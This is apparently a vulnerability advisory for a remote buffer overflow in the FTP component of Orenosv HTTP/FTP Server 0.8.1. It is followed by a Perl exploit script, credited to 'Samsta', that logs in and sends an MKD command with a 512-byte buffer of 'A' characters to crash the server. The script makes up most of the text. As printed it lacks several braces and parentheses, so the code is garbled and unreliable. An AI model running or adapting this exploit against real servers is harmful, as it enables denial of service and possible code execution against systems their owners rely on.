The FTP server shipped with Orenosv HTTP/FTP is prone to a remote buffer-overflow vulnerability.
This issue presents itself when the application handles excessive values supplied as filenames through various FTP commands.
A successful attack may corrupt memory, cause a denial of service, or execute arbitrary code.
Orenosv HTTP/FTP Server 0.8.1 is reportedly vulnerable; other versions may be affected as well.
use IO::Socket;
$target = shift || useage ();
$port = shift || useage ();
$user = shift || useage ();
$pass = shift || useage ();
print"[*] Connecting to $target on port $port\n";
my $sock = IO::Socket::INET -> new
Proto => 'tcp',
PeerAddr => $target,
PeerPort => $port
)or die ("Cannot Connect, Have you already DoSed It?\n");
print"[*] Connected, Logging In...\n";
sleep 3;
$sock -> send ("USER $user\r\n");
sleep 3;
$sock -> send ("PASS $pass\r\n");
while ($data = <$sock>)
if ($data =~ /230/)
print"[*] Logged In\n";
print"[*] Creating 512-byte Buffer\n";
$buffer = 'A' x 512;
print"[*] Sending Exploit\n";
$sock -> send ("MKD $buffer\r\n");
print"[*] Exploit Sent\n";
sub useage ()
print "Useage: $0 <Host> <Port> <Username> <Password>\n";
#Coded By Samsta